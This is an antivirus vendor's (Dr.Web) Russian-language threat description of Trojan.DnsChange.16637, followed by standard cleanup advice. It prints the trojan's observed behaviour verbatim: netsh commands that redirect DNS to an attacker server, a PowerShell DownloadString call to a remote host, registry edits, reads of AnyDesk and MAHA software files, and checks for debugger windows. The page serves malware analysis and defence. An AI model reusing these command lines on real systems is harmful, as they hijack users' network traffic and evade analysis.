Поддержка
Круглосуточная поддержка

Позвоните

Бесплатно по России:
8-800-333-79-32

ЧаВо | Форум

Ваши запросы

  • Все: -
  • Незакрытые: -
  • Последний: -

Позвоните

Бесплатно по России:
8-800-333-79-32

Свяжитесь с нами Незакрытые запросы: 

Профиль

Профиль

Trojan.DnsChange.16637

Добавлен в вирусную базу Dr.Web: 2022-10-26

Описание добавлено:

Техническая информация

Вредоносные функции
Для затруднения выявления своего присутствия в системе
изменяет следующие системные настройки:
  • Изменяет DNS-сервер на '<DNS_SERVER>'
  • Изменяет DNS-сервер на '185.128.139.29'
Загружает
  • http://www.sp###check.ir/
Ищет следующие окна с целью
обнаружения утилит для анализа:
  • ClassName: 'OLLYDBG', WindowName: ''
  • ClassName: 'GBDYLLO', WindowName: ''
  • ClassName: 'pediy06', WindowName: ''
  • ClassName: 'FilemonClass', WindowName: ''
  • ClassName: '', WindowName: 'File Monitor - Sysinternals: www.sysinternals.com'
  • ClassName: 'PROCMON_WINDOW_CLASS', WindowName: ''
  • ClassName: '', WindowName: 'Process Monitor - Sysinternals: www.sysinternals.com'
  • ClassName: 'RegmonClass', WindowName: ''
  • ClassName: '', WindowName: 'Registry Monitor - Sysinternals: www.sysinternals.com'
Сетевая активность
TCP
Другие
  • '<DNS_SERVER>':53
UDP
  • DNS ASK microsoft.com
Другое
Ищет следующие окна
  • ClassName: '18467-41' WindowName: ''
Запускает на исполнение
  • '%WINDIR%\syswow64\cmd.exe' /c @for /f "delims=" %1 in ('dir /s /b "%ProgramFiles(x86)%\MAHA\eurosy32.exe"') do @echo %~dp1
  • '%WINDIR%\syswow64\reg.exe' add HKLM\SOFTWARE\Microsoft\EventSystem\Eventlog /v InitialWin /t reg_dword /d 0 /f
  • '%WINDIR%\syswow64\cmd.exe' /c REG QUERY "HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\EVENT VIEWEr" /V "MicrosoftRedirectionURL"| find /i "REG_SZ"
  • '%WINDIR%\syswow64\cmd.exe' /c @for /f "tokens=3 delims=><" %1 in ('POWERSHELL -COMMAND ^(NEW-OBJECT SYSTEM.NET.WEBCLIENT^).DOWNLOADSTRING^('http://www.sp###check.ir/'^) ^| find /i "h2 class="') do @echo %1
  • '%WINDIR%\syswow64\reg.exe' QUERY "HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\EVENT VIEWEr" /V "MicrosoftRedirectionURL"
  • '%WINDIR%\syswow64\find.exe' /i "REG_SZ"
  • '%WINDIR%\syswow64\cmd.exe' /c wmic nic where "NetConnectionStatus=2" get NetConnectionID /format:value
  • '%WINDIR%\syswow64\reg.exe' add HKLM\SOFTWARE\Microsoft\EventSystem\Eventlog /v FinalApp /t reg_dword /d 0 /f
  • '%WINDIR%\syswow64\wbem\wmic.exe' nic where "NetConnectionStatus=2" get NetConnectionID /format:value
  • '%WINDIR%\syswow64\netsh.exe' interface ip add dns name="Local Area Connection" addr=8.8.8.8 index=2
  • '%WINDIR%\syswow64\findstr.exe' /s "^" "backup\es_in\*.txt"
  • '%WINDIR%\syswow64\cmd.exe' /c POWERSHELL -COMMAND (NEW-OBJECT SYSTEM.NET.WEBCLIENT).DOWNLOADSTRING('http://www.sp###check.ir/') | find /i "h2 class="
  • '%WINDIR%\syswow64\find.exe' /i "[DATAOUT]"
  • '%WINDIR%\syswow64\reg.exe' add HKLM\SOFTWARE\Microsoft\EventSystem\Eventlog /v FinalApp1 /t reg_dword /d 0 /f
  • '%WINDIR%\syswow64\reg.exe' add HKLM\SOFTWARE\Microsoft\EventSystem\Eventlog /v EncApp /t reg_dword /d 0 /f
  • '%WINDIR%\syswow64\find.exe' /i "h2 class="
  • '%WINDIR%\syswow64\cmd.exe' /c @echo Local Area Connection
  • '%WINDIR%\syswow64\cmd.exe' /c @type "%ALLUSERSPROFILE%\Anydesk.bin"
  • '%WINDIR%\syswow64\cmd.exe' /c findstr /s "^" "backup\es_in\*.txt"| find /i "[DATAOUT]"
  • '%WINDIR%\syswow64\reg.exe' add HKLM\SOFTWARE\Microsoft\EventSystem\Eventlog /v WinInstrument /t reg_dword /d 0 /f
  • '%WINDIR%\syswow64\cmd.exe' /c echo SQLEUROSYSTEM.ini| find /i "7"
  • '%WINDIR%\syswow64\cmd.exe' /c dir /s /b "%ProgramFiles(x86)%\MAHA\eurosy32.exe"
  • '%WINDIR%\syswow64\cmd.exe' /c for /f "tokens=1 delims=:" %1 in ('findstr /n "^" "eurosy32.ini" ^| find /i "PATH_SaveIn="') do @echo %1 > "f2" && @for /f %5 in ('type "f2"') do @echo %5 && (@for /f "tokens=1* delims=:" %...
  • '%WINDIR%\syswow64\cmd.exe' /c @reg add HKLM\SOFTWARE\Microsoft\EventSystem\Eventlog /v upsv /t reg_dword /d 0 /f & @reg add HKLM\SOFTWARE\Microsoft\EventSystem\Eventlog /v WinLic /t reg_dword /d 0 /f & @reg add HKLM\SOFT...
  • '%WINDIR%\syswow64\cmd.exe' /c @for /f "tokens=*" %1 in ('@echo "SQLEUROSYSTEM.ini"') do @for %2 in (%~1) do @for /f "tokens=*" %8 in ('echo %2^| find /i "7"') do @if /i %8 geq 720 (@for /f "tokens=2 delims==" %1 in ('@fi...
  • '%WINDIR%\syswow64\cmd.exe' /c findstr /n "^" "eurosy32.ini" | find /i "PATH_SaveIn="
  • '%WINDIR%\syswow64\cmd.exe' /c @echo "SQLEUROSYSTEM.ini"
  • '%WINDIR%\syswow64\reg.exe' add HKLM\SOFTWARE\Microsoft\EventSystem\Eventlog /v upsv /t reg_dword /d 0 /f
  • '%WINDIR%\syswow64\find.exe' /i "PATH_SaveIn="
  • '%WINDIR%\syswow64\reg.exe' add HKLM\SOFTWARE\Microsoft\EventSystem\Eventlog /v ProxyPL /t reg_dword /d 0 /f
  • '%WINDIR%\syswow64\findstr.exe' /n "^" "eurosy32.ini"
  • '%WINDIR%\syswow64\find.exe' /i "7"
  • '%WINDIR%\syswow64\cmd.exe' /S /D /c" echo SQLEUROSYSTEM.ini"
  • '%WINDIR%\syswow64\reg.exe' add HKLM\SOFTWARE\Microsoft\EventSystem\Eventlog /v WinLic /t reg_dword /d 0 /f
  • '%WINDIR%\syswow64\reg.exe' add HKLM\SOFTWARE\Microsoft\EventSystem\Eventlog /v RtxQery /t reg_dword /d 0 /f
  • '%WINDIR%\syswow64\cmd.exe' /c @for /f "tokens=3" %1 in ('REG QUERY "HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\EVENT VIEWEr" /V "MicrosoftRedirectionURL"^| find /i "REG_SZ"') do @echo %~1
  • '%WINDIR%\syswow64\cmd.exe' /c for /f "tokens=3 delims=:" %1 in ('findstr /s "^" "backup\es_in\*.txt"^| find /i "[DATAOUT]"') do @echo %1
  • '%WINDIR%\syswow64\cmd.exe' /c @for /f "tokens=2 delims==" %1 in ('wmic nic where "NetConnectionStatus=2" get NetConnectionID /format:value') do @for /f "delims=" %2 in ('@echo %1') do (netsh interface ip add dns name="%...
  • '%WINDIR%\syswow64\netsh.exe' interface ip add dns name="Local Area Connection" addr=185.128.139.29 index=1

Рекомендации по лечению

  1. В случае если операционная система способна загрузиться (в штатном режиме или режиме защиты от сбоев), скачайте лечащую утилиту Dr.Web CureIt! и выполните с ее помощью полную проверку вашего компьютера, а также используемых вами переносных носителей информации.
  2. Если загрузка операционной системы невозможна, измените настройки BIOS вашего компьютера, чтобы обеспечить возможность загрузки ПК с компакт-диска или USB-накопителя. Скачайте образ аварийного диска восстановления системы Dr.Web® LiveDisk или утилиту записи Dr.Web® LiveDisk на USB-накопитель, подготовьте соответствующий носитель. Загрузив компьютер с использованием данного носителя, выполните его полную проверку и лечение обнаруженных угроз.
Скачать Dr.Web

По серийному номеру

Выполните полную проверку системы с использованием Антивируса Dr.Web Light для macOS. Данный продукт можно загрузить с официального сайта Apple App Store.

На загруженной ОС выполните полную проверку всех дисковых разделов с использованием продукта Антивирус Dr.Web для Linux.

Скачать Dr.Web

По серийному номеру

  1. Если мобильное устройство функционирует в штатном режиме, загрузите и установите на него бесплатный антивирусный продукт Dr.Web для Android Light. Выполните полную проверку системы и используйте рекомендации по нейтрализации обнаруженных угроз.
  2. Если мобильное устройство заблокировано троянцем-вымогателем семейства Android.Locker (на экране отображается обвинение в нарушении закона, требование выплаты определенной денежной суммы или иное сообщение, мешающее нормальной работе с устройством), выполните следующие действия:
    • загрузите свой смартфон или планшет в безопасном режиме (в зависимости от версии операционной системы и особенностей конкретного мобильного устройства эта процедура может быть выполнена различными способами; обратитесь за уточнением к инструкции, поставляемой вместе с приобретенным аппаратом, или напрямую к его производителю);
    • после активации безопасного режима установите на зараженное устройство бесплатный антивирусный продукт Dr.Web для Android Light и произведите полную проверку системы, выполнив рекомендации по нейтрализации обнаруженных угроз;
    • выключите устройство и включите его в обычном режиме.

Подробнее о Dr.Web для Android

Демо бесплатно на 14 дней

Выдаётся при установке